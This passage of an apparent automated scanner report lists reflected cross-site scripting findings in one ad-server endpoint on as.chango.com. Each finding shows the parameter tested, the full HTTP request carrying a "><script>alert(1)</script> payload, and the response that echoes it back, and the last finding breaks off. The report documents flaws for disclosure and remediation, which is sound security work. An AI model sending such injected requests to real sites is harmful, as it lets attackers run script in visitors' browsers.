Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:58:59 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:58:59 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west14194"><script>alert(1)</script>1438e1bd2b4&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickURL=">
...[SNIP]...

4.25. http://as.chango.com/links/adunit/1.31759988192e+12 [datc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the datc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa5ec"><script>alert(1)</script>1085ffe8a15 was submitted in the datc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+joseaa5ec"><script>alert(1)</script>1085ffe8a15&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "a29d24cc6e07eb15125d8d1b3ceb62291aecc91c"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:05 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:05 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:05 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
tball/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san joseaa5ec"><script>alert(1)</script>1085ffe8a15&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu
...[SNIP]...

4.26. http://as.chango.com/links/adunit/1.31759988192e+12 [dc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the dc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b406f"><script>alert(1)</script>02b8bac3890 was submitted in the dc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemediab406f"><script>alert(1)</script>02b8bac3890&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "f2ff7ee7580ca0f599186a62d9136e72ad18ae1a"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:07 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:07 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemediab406f%22%3E%3Cscript%3Ealert%281%29%3C/script%3E02b8bac3890%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:07 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
dian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemediab406f"><script>alert(1)</script>02b8bac3890&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae46
...[SNIP]...

4.27. http://as.chango.com/links/adunit/1.31759988192e+12 [dom parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the dom request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0e1e"><script>alert(1)</script>6db27d1746e was submitted in the dom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.ukf0e1e"><script>alert(1)</script>6db27d1746e&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "3b9cdd9277b1c295e99fb4dc357a0b4d01f3458b"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:10 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:10 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:10 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
ck1=http://as.chango.com/links/click1317599950.77?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.ukf0e1e"><script>alert(1)</script>6db27d1746e&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware
...[SNIP]...

4.28. http://as.chango.com/links/adunit/1.31759988192e+12 [eid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the eid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b611"><script>alert(1)</script>1eedbcf2072 was submitted in the eid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon8b611"><script>alert(1)</script>1eedbcf2072&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "59a5142f96efa33ad5f002277312b5f2c31c491d"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:23 GMT
Content-Length: 2349
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:23 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon8b611%22%3E%3Cscript%3Ealert%281%29%3C/script%3E1eedbcf2072%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:23 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
36?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon8b611"><script>alert(1)</script>1eedbcf2072&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=0&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder
...[SNIP]...

4.29. http://as.chango.com/links/adunit/1.31759988192e+12 [ht parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the ht request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45475"><script>alert(1)</script>21ae6b0bc46 was submitted in the ht parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=25045475"><script>alert(1)</script>21ae6b0bc46&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Content-Length: 588
Server: Chango RTB Server
ETag: "5ba78575886bd3594b59106bc3638a8dfdeb6a66"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:26 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:26 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:26 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml
...[SNIP]...
<body style="width: 300px; height: 25045475"><script>alert(1)</script>21ae6b0bc46px; margin: 0; padding: 0;">
...[SNIP]...

4.30. http://as.chango.com/links/adunit/1.31759988192e+12 [ibs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the ibs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dd05"><script>alert(1)</script>4ccae8e57d1 was submitted in the ibs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None6dd05"><script>alert(1)</script>4ccae8e57d1&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "c9ad73da996eca9026305ba55d6dd77afee7681f"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:28 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:28 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:28 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
//as.chango.com/links/click1317599968.42?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None6dd05"><script>alert(1)</script>4ccae8e57d1&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=
...[SNIP]...

4.31. http://as.chango.com/links/adunit/1.31759988192e+12 [poo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the poo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b15f"><script>alert(1)</script>0aaee42b2aa was submitted in the poo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p5b15f"><script>alert(1)</script>0aaee42b2aa&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "238ea0fb61ae84561530a6e4e50ebda879606458"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:38 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:38 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:38 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
om/links/click1317599978.28?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p5b15f"><script>alert(1)</script>0aaee42b2aa&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=
...[SNIP]...

4.32. http://as.chango.com/links/adunit/1.31759988192e+12 [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the sid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4215"><script>alert(1)</script>69873abae82 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426c4215"><script>alert(1)</script>69873abae82&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "7cff87f18ac98ed42845ee33f9e6e0bf79efaf95"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:39 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:39 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:39 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
